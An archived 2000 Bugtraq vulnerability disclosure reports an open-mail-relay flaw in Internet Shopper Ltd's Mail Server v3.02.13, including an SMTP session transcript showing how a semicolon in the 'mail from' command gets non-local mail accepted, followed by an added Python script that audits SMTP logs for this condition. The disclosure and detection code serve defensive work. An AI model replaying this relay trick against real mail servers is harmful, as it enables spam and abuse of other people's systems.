[16801] in bugtraq
Internet Shopper Ltd's Mail Server Open relay bug.
daemon@ATHENA.MIT.EDU (Imran Ghory)
Mon Sep 18 00:53:32 2000
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7BIT
Message-Id: <39C2897F.21917.2F4CD7@localhost>
Date: Fri, 15 Sep 2000 20:41:35 +0100
Reply-To: Imran Ghory <ImranG@BTINTERNET.COM>
From: Imran Ghory <ImranG@BTINTERNET.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Internet Shopper Ltd's Mail Server Open relay bug.
(I have been unable to make contact with Internet Shopper Ltd, and
as this bug might easily be found accidentally I have decided to make
it public)
SUMMARY:
Internet Shopper Ltd's Mail Server can be made to accept and
handle mail for non-local sites.
DETAILS:
Version involved:
Internet Shopper Ltd's Mail Server v3.02.13
No other versions have been tested.
Exploit:
The use of a semi-colon in the "mail from" command will allow
mail to be sent to machines that aren't local.
Exploit in action:
220 mailsvr.xxxxxxxxxx.ac.uk WindowsNT SMTP Server
v3.02.13/32.aap3 ready at Wed, 13 Sep 2000 21:03:39 +0100
helo me
250 mailsvr.xxxxxxxxxx.ac.uk me
mail from;
250 Ok.
rcpt to: ImranG@btinternet.com
250 Ok.
data
354 Start mail input, end with <CRLF>.<CRLF>.
Test data
.
250 Requested mail action Ok.
quit
221 Goodbye me
Fix:
None known at this time.
Imran Ghory
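
For mail administrators reviewing SMTP session logs, the following is an added example (not part of the original post and not vendor code) that flags the two conditions visible in the transcript above: a "mail from" command without the required colon being answered 2xx, and a 2xx reply to a recipient outside the server's local domains. The (who, text) log format, the function name, the hostnames and the local domain list are assumptions made for illustration; the sample session is constructed.

```python
import re

# The colon after FROM/TO is mandatory (RFC 5321); brackets are treated leniently.
MAIL_OK = re.compile(r"^MAIL\s+FROM:\s*(<[^<>\s]*>|[^<>\s]+)", re.I)
RCPT_OK = re.compile(r"^RCPT\s+TO:\s*<?[^<>\s@]+@([^<>\s]+?)>?\s*$", re.I)

def audit_session(lines, local_domains):
    """lines: (who, text) pairs, who is 'C' (client) or 'S' (server).
    Returns findings for malformed MAIL commands that were accepted and
    for accepted recipients whose domain is not in local_domains."""
    findings, last_cmd, in_data = [], "", False
    for who, text in lines:
        if who == "C":
            if in_data:                     # message body, not commands
                in_data = text != "."       # lone dot ends the body
                if in_data:
                    continue
            last_cmd = text.strip()
            continue
        code = text[:3]
        if code == "354":                   # server is now reading the body
            in_data = True
        if not code.startswith("2"):        # only accepted commands matter
            continue
        verb = last_cmd.upper()
        if verb.startswith("MAIL") and not MAIL_OK.match(last_cmd):
            findings.append(("malformed-mail-accepted", last_cmd))
        elif verb.startswith("RCPT"):
            m = RCPT_OK.match(last_cmd)
            if m and m.group(1).lower() not in local_domains:
                findings.append(("non-local-rcpt-accepted", last_cmd))
        last_cmd = ""
    return findings

# Constructed session modelled on the transcript in the post.
SAMPLE = [
    ("S", "220 mail.example.ac.uk SMTP Server ready"),
    ("C", "helo me"), ("S", "250 mail.example.ac.uk me"),
    ("C", "mail from;"), ("S", "250 Ok."),
    ("C", "rcpt to: user@example.org"), ("S", "250 Ok."),
    ("C", "data"), ("S", "354 Start mail input"),
    ("C", "mail from; inside the body"), ("C", "."),
    ("S", "250 Requested mail action Ok."),
    ("C", "quit"), ("S", "221 Goodbye me"),
]

if __name__ == "__main__":
    for kind, cmd in audit_session(SAMPLE, {"example.ac.uk"}):
        print(kind, "->", cmd)
```

A 2xx reply to a non-local recipient is expected for authenticated or trusted-network clients, so such sessions should be excluded before running the check.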